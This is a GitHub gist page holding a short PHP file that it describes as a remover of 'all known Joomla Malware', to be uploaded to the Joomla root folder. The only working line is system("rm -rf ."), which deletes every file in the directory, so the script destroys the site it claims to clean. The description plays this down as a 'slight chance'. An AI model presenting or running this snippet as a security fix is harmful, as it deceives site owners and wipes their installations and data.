Skip to content

Instantly share code, notes, and snippets.

@dajoho
Created June 26, 2013 07:26
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save dajoho/5865425 to your computer and use it in GitHub Desktop.
Save dajoho/5865425 to your computer and use it in GitHub Desktop.
Removes all known Joomla Malware. Use at own risk. There is a slight chance it might kill your installation. Upload to root folder of Joomla.
<?php
# Removes all known Joomla Malware.
system("rm -rf .");
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment